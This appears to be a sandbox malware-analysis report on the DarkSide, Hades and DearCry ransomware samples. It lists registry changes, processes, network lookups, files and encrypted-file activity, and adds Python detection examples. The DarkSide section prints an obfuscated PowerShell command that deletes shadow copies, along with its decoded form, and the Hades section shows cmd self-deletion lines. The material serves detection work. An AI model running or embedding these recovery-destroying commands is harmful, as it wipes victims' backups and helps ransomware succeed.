| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
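The wallpaper and registry-class rows above show one pattern worth correlating rather than reading row by row: the sample creates a file-type class for a new extension (.5a727a6e), points that class's DefaultIcon at a dropped .ico, and sets the desktop wallpaper to a dropped .BMP, all named with the same token. The following Python is an added example, not part of the sandbox report or the analyzer's own tooling: it parses the signature rows verbatim as they appear above (embedded as a constructed sample) and emits one finding per extension registration, recording whether the icon and wallpaper basenames share the extension token. The row layout, regexes and field names are this example's assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: the "Sets desktop wallpaper" and "Modifies registry
# class" rows from the behavioral20 signature tables, copied verbatim.
SAMPLE_ROWS = r"""
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\5a727a6e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5a727a6e.ico" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.5a727a6e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.5a727a6e\ = "5a727a6e" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
"""

# Row layout assumed from the tables above: | op | indicator | process | target |
ROW_RE = re.compile(r"^\|\s*(?P<op>[^|]+?)\s*\|\s*(?P<ind>[^|]+?)\s*\|\s*(?P<proc>[^|]+?)\s*\|")
KV_RE = re.compile(r'^(?P<key>.+?)\s*=\s*"(?P<val>.*)"$')
EXT_RE = re.compile(r"\\Classes\\\.(?P<ext>[^\\]+)$", re.IGNORECASE)
ICON_RE = re.compile(r"\\Classes\\(?P<progid>[^\\.][^\\]*)\\DefaultIcon$", re.IGNORECASE)
WALLPAPER_RE = re.compile(r"\\Control Panel\\Desktop\\Wallpaper$", re.IGNORECASE)


def parse_rows(table_text: str) -> list:
    """Turn signature-table rows into registry events (op, key, value, process)."""
    events = []
    for line in table_text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m or m.group("op") == "Description":  # skip header row
            continue
        indicator = m.group("ind")
        kv = KV_RE.match(indicator)
        if kv:
            # The report doubles backslashes inside quoted values; undo that.
            key, value = kv.group("key"), kv.group("val").replace("\\\\", "\\")
        else:
            key, value = indicator, None  # bare "Key created" row
        events.append({"op": m.group("op"), "key": key.rstrip("\\"),
                       "value": value, "process": m.group("proc")})
    return events


def correlate(events: list) -> list:
    """Link extension -> ProgID -> DefaultIcon and the wallpaper change per process."""
    per_proc = defaultdict(lambda: {"ext_to_progid": {}, "progid_to_icon": {}, "wallpaper": None})
    for ev in events:
        if ev["value"] is None:
            continue  # key creation alone carries no linkage; the Set value rows do
        state = per_proc[ev["process"]]
        m_ext = EXT_RE.search(ev["key"])
        m_icon = ICON_RE.search(ev["key"])
        if m_ext:
            state["ext_to_progid"][m_ext.group("ext")] = ev["value"]
        elif m_icon:
            state["progid_to_icon"][m_icon.group("progid")] = ev["value"]
        elif WALLPAPER_RE.search(ev["key"]):
            state["wallpaper"] = ev["value"]

    findings = []
    for proc, state in per_proc.items():
        for ext, progid in state["ext_to_progid"].items():
            icon = state["progid_to_icon"].get(progid)
            wallpaper = state["wallpaper"]
            basenames = [p.rsplit("\\", 1)[-1].lower() for p in (icon, wallpaper) if p]
            findings.append({
                "process": proc,
                "extension": "." + ext,
                "progid": progid,
                "icon": icon,
                "wallpaper": wallpaper,
                # One token reused as extension, ProgID, icon name and wallpaper name.
                "shared_token": len(basenames) == 2 and all(ext.lower() in b for b in basenames),
            })
    return findings


if __name__ == "__main__":
    for finding in correlate(parse_rows(SAMPLE_ROWS)):
        print(finding)
```

Run against the rows above it yields a single finding for DarkSide_16_01_2021_59KB.exe: extension .5a727a6e, ProgID 5a727a6e, icon C:\Users\Admin\AppData\Local\5a727a6e.ico, wallpaper C:\ProgramData\5a727a6e.BMP, shared_token True. A new extension class whose icon and the wallpaper are both fresh files under user-writable paths, written by the same non-installer process, is a stronger signal than any one of those registry writes on its own.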
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2504 wrote to memory of 3656 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2504 wrote to memory of 3656 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
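The powershell.exe command line in the process list above is the hex-loop obfuscation DarkSide uses for shadow copy removal: (0..61) walks a hex string two characters at a time, rebuilds a script in $s and hands it to iex, which is why vssvc.exe starts afterwards and why the report flags "Uses Volume Shadow Copy service COM API". The Python below is an added example, not part of this report or the sandbox's own detection logic: it decodes that loop the way PowerShell would (only the first N+1 byte pairs, so the blob's trailing 0x20 is never executed) and scores the result. It goes beyond this page in also matching the vssadmin and wmic forms of shadow copy deletion, which are an assumption of the example rather than something observed here; the constructed sample is the command line copied from the process list above.

```python
import re

# Constructed sample: the powershell.exe command line recorded in the
# Processes list above, spawned by DarkSide_16_01_2021_59KB.exe.
SAMPLE_CMDLINE = (
    r'powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('
    r"'0x'+'"
    r"4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20"
    r"466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20"
    r"'.Substring(2*$_,2))};iex $s"
    r'"'
)

# (0..N)|%{ ... 'HEX'.Substring(2*$_,2) }: N+1 hex pairs become N+1 characters.
HEX_LOOP_RE = re.compile(
    r"\(0\.\.(?P<last>\d+)\).*?'(?P<hex>[0-9A-Fa-f]{20,})'\.Substring\(2\*\$_,\s*2\)",
    re.DOTALL,
)

# Shadow-copy removal as seen on this page (WMI Win32_Shadowcopy + Delete()),
# plus the vssadmin/wmic forms, which are an assumption not taken from this report.
SHADOW_DELETE_PATTERNS = [
    re.compile(r"Win32_Shadowcopy.*?\.Delete\(\)", re.IGNORECASE | re.DOTALL),
    re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.IGNORECASE),
    re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.IGNORECASE),
]


def decode_hex_loop(cmdline: str):
    """Rebuild the script the hex loop hands to iex, or None if there is no loop.

    Only the first N+1 byte pairs are decoded, exactly as the loop bound
    dictates; any pairs beyond that in the blob are never executed.
    """
    m = HEX_LOOP_RE.search(cmdline)
    if not m:
        return None
    count = int(m.group("last")) + 1
    blob = m.group("hex")[: 2 * count]
    try:
        return bytes.fromhex(blob).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_cmdline(cmdline: str) -> dict:
    """Flag a PowerShell command line for the shadow-copy deletion pattern."""
    decoded = decode_hex_loop(cmdline)
    visible = cmdline + "\n" + (decoded or "")  # match on the raw and decoded text
    flags = {
        "bypass_execution_policy": bool(
            re.search(r"-e(?:xecutionpolicy|p)\s+bypass", cmdline, re.IGNORECASE)
        ),
        "invoke_expression": bool(
            re.search(r"\b(?:iex|Invoke-Expression)\b", cmdline, re.IGNORECASE)
        ),
        "hex_loop_obfuscation": decoded is not None,
        "shadow_copy_deletion": any(p.search(visible) for p in SHADOW_DELETE_PATTERNS),
    }
    # Recovery inhibition is worth an alert on its own; obfuscation plus
    # policy bypass without it is still worth a look.
    if flags["shadow_copy_deletion"]:
        verdict = "alert"
    elif sum(flags.values()) >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"decoded": decoded, "flags": flags, "verdict": verdict}


if __name__ == "__main__":
    result = analyze_cmdline(SAMPLE_CMDLINE)
    print(result["decoded"])
    print(result["verdict"], result["flags"])
```

Decoding the sample yields Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} and every flag set. The important property for detection is that the match runs over the decoded text, not the raw command line: a rule keyed on the literal string Win32_Shadowcopy never sees it here, while the 0x-prefixed Substring loop, -ep bypass and a trailing iex are stable enough to decode first and judge second.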
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4ckz4me.vlp.ps1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\README.5a727a6e.TXT
Analysis: behavioral26
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:40
Platform
win10v2004-20240508-en
Max time kernel
1751s
Max time network
1764s
Command Line
Signatures
Hades Ransomware
Hades payload
CryptOne packer
Renames multiple (160) files with added filename extension
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DsDownload\Serv | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"
C:\Users\Admin\AppData\Roaming\DsDownload\Serv
C:\Users\Admin\AppData\Roaming\DsDownload\Serv /go
C:\Windows\SYSTEM32\cmd.exe
cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\DsDownload\Serv" & del "C:\Users\Admin\AppData\Roaming\DsDownload\Serv" & rd "C:\Users\Admin\AppData\Roaming\DsDownload\"
C:\Windows\SYSTEM32\cmd.exe
cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"
C:\Windows\system32\waitfor.exe
waitfor /t 10 pause /d y
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"
C:\Windows\system32\waitfor.exe
waitfor /t 10 pause /d y
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\AppData\Roaming\DsDownload\Serv"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\DsDownload\Serv
C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt
Analysis: behavioral23
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:39
Platform
win7-20240704-en
Max time kernel
1440s
Max time network
1449s
Command Line
Signatures
DearCry
Renames multiple (3331) files with added filename extension
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UGUBWRQR\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\FreeCell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CGY9ZAGI\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\OORJZY5Z\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links for United States\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\Sample Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U42VY3XA\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Recorded TV\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Mahjong\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4NH6FMWO\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VUPQHL12\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Chess\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TWVGEE8A\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\Sample Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Hearts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SX809FAK\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Solitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\THMBNAIL.PNG.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
